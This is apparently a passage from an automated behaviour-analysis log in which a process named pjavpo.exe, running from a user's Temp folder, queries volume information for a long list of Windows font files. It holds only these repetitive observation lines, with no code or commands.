                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
